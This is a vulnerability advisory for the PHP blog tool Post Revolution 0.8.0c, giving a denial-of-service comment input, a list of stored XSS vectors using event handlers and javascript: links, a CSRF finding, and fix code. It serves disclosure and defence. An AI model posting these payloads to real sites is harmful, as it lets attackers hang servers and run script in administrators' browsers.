Post Revolution 0.8.0c XSS / XSRF / Denial Of Service

Posted Jun 1, 2011
Authored by Javier Bassi

Post Revolution version 0.8.0c suffers from cross site request forgery, cross site scripting, and denial of service vulnerabilities.

tags | exploit, denial of service, vulnerability, xss, info disclosure, csrf
advisories | CVE-2011-1952, CVE-2011-1953, CVE-2011-1954
SHA-256 | c326ab8cc2255d5e582a5a5c103cc9b9e6e64ac1effb215d3c8e08c05d0b1799

info
———————————
Name : Post Revolution 0.8.0c Multiple Remote Vulnerabilities
Class: Design Error && Input Validation Error
CVE: CVE-2011-1952, CVE-2011-1953, CVE-2011-1954
Remote: Yes
Local: No
Credit : Javier Bassi <javierbassi [at] gmail [dot] com>
Vulnerable : All versions prior to and including 0.8.0c are affected.
Vendor Homepage : http://postrev.com.ar



description
———————————
Post Revolution is an open source blog tool and publishing platform
powered by PHP and MySQL.



discussion
———————————
Post Revolution is prone to multiple remote vulnerabilities, including:
1. A denial-of-service vulnerability. (CWE-835) (CVE-2011-1952)
2. Persistent cross-site scripting vulnerabilities. (CWE-79) (CVE-2011-1953)
3. Cross-site request forgery vulnerabilities. (CWE-352) (CVE-2011-1954)

An attacker may leverage these issues to cause a denial-of-service
condition, perform certain administrative actions, execute arbitrary
script code in the browser of an unsuspecting user in the context of
the website, steal cookie-based authentication credentials, and gain
unauthorized access to the affected application.
Post Revolution 0.8.0c is vulnerable.



timeline
———————————
2011.05.22 – Informed developers
2011.05.23 – Patch for issues 1 & 2 released.
2011.06.01 – Disclosed



details/pocs
———————————
1. Denial of service vulnerability
Post Revolution allows some HTML tags in comments and removes all
non-permitted ones.
The vulnerable code is at lines 456 to 462 of common.php:

    // Vulnerable as shipped in 0.8.0c: loops while a '<' exists past position 0
    while(stripos($s,'<') > 0){
        $pos[1] = stripos($s,'<');            // start of the next tag
        $pos[2] = stripos($s,'>', $pos[1]);   // false if no closing '>' follows
        $len[1] = $pos[2] - $pos[1] + 1;      // becomes 0 when $pos[2] is false
        $x = substr($s,$pos[1],$len[1]);      // '' for a dangling '<'
        $s = str_replace($x,'',$s);           // str_replace('', '', $s) leaves $s unchanged
    }

This code tries to remove every non-permitted HTML tag; $s is the
content of the comment. An attacker can post a comment containing just
'a<', and then while(stripos($s,'<') > 0) is always true because
pos[1]=1, pos[2] will be NULL, len[1]=0 and x = NULL, so $s is
'a<' again.
This causes an infinite loop that ends only when PHP kills the
script, printing:
Fatal error: Maximum execution time of 30 seconds exceeded in
/var/www/postrev/common.php on line 459
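As an added example (not code from the advisory or from Post Revolution), the same loop rewritten so that a dangling '<' cannot stall it; the function name is this example's own, and it only fixes termination, removing every tag it finds rather than applying the tag whitelist.

```php
<?php
// Added example, not Post Revolution's code: a version of the common.php
// tag-stripping loop that always terminates. The original never advances on
// input such as 'a<' because stripos() finds no '>' and returns false, the
// computed length becomes 0, substr() yields '' and str_replace('', '', $s)
// leaves $s untouched. Here every iteration shortens $s by at least one
// character, so the number of iterations is bounded by strlen($s).
function strip_tags_terminating($s) {
    $offset = 0;
    // Compare against false: the original's "> 0" test also skips a '<'
    // that sits at position 0 of the comment.
    while (($open = stripos($s, '<', $offset)) !== false) {
        $close = stripos($s, '>', $open);
        if ($close === false) {
            // Dangling '<' with no closing '>': drop just that character
            // and keep scanning from the same offset.
            $s = substr($s, 0, $open) . substr($s, $open + 1);
        } else {
            // Cut out exactly this tag at its offset instead of
            // str_replace()'ing every identical copy in the comment.
            $s = substr($s, 0, $open) . substr($s, $close + 1);
        }
        $offset = $open;
    }
    return $s;
}

// Constructed inputs: the advisory's 'a<' payload and a comment that mixes
// a closed tag with a trailing dangling '<'.
var_dump(strip_tags_terminating('a<'));
var_dump(strip_tags_terminating('<b>x</b>y<'));
```

Run it with `php` on the command line; both calls return promptly instead of hitting the execution time limit.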


2. Cross-site scripting vulnerabilities
Post Revolution allows the following tags in comments:
p,strong,a,em,i,img,li,ol,video,blockquote
and does not sanitize their attributes.
So the following XSS vectors work:
<a href="javascript:alert(1)">some text</a>
<p onmouseover="javascript:alert(1)">some text</p>
<a href="" onmouseover="javascript:alert(1);">some text</a>
<em onmouseover="javascript:alert(1)">some text</em>
<strong onmouseover="javascript:alert(1)">some text</strong>
<i onmouseover="javascript:alert(1)">some text</i>
<img src="https://encrypted.google.com/images/logos/ssl_logo_lg.gif"
onmouseover="javascript:alert(1)" />
<ol><li onmouseover="javascript:alert(1)">some text</li></ol>
<ol onmouseover="javascript:alert(1)"><li>1</li><li>2</li></ol>
<blockquote onmouseover="javascript:alert(1)">some text</blockquote>

The same works with other events such as onclick, onmouseout, onmousemove, onkeydown, etc.
Also note that PR doesn't close the tag for you, so it's not
necessary for the admin to mouse over the comment itself. If the attacker
posts <p onmouseover="javascript:alert(1)">some text
the mouseover event will fire when the admin moves the mouse
anywhere below the attacker's comment.


3. Cross-site request forgery vulnerabilities
There is CSRF everywhere in ajax-weblog-guardar.php, verpost.php,
comments.php, perfil.php, etc. PR 0.8.0c has absolutely no protection
against CSRF in any form, except for anonymous comments and
registration, which have a captcha.
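The synchronizer-token pattern that would close the CSRF holes named above, as an added example rather than Post Revolution code; the function names are this example's own and it assumes PHP 7 or later for random_bytes().

```php
<?php
// Added example, not Post Revolution's code: a per-session anti-CSRF token
// embedded in every state-changing form and verified before any write.
// Function names (csrf_token, csrf_field, check_csrf_token) are this
// example's own; assumes PHP >= 7.0 for random_bytes().
function csrf_token() {
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        // 32 bytes from the CSPRNG, hex-encoded so it embeds safely.
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field() {
    // Hidden input for HTML forms; escaped like any other output.
    return '<input type="hidden" name="csrf_token" value="'
         . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function check_csrf_token() {
    // State changes must come via POST; a GET that changes state is
    // forgeable with a plain <img> tag.
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit('Use POST for state-changing requests');
    }
    $sent = (isset($_POST['csrf_token']) && is_string($_POST['csrf_token']))
          ? $_POST['csrf_token'] : '';
    // Constant-time comparison so the token cannot be guessed byte by byte.
    if (!hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}

// Usage: in a script such as comments.php, call check_csrf_token() before
// touching the database, and echo csrf_field() inside the form that posts
// to it.
```

For AJAX endpoints, send the same token value in the POST body or a custom request header and compare it with hash_equals() in the same way.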



solution
———————————
You can fix the DoS and XSS vulnerabilities quickly by replacing the whole
check_html function in common.php (lines 416 to 471) with:
    function check_html($s){
        // Escape everything: no HTML tags or attributes survive
        return htmlspecialchars($s);
    }

Users will not be able to format their comments with HTML but Post
Revolution already has BBcode so there was no need of HTML in comments
in the first place.
NO HTML FOR YOU!

Fixing the CSRF issues will require some coding.
The vendor has released a patch for issues 1 and 2:
postrev.com.ar



References
———————————
1. Advisory URL: http://javierb.com.ar/2011/06/01/postrev-vunls/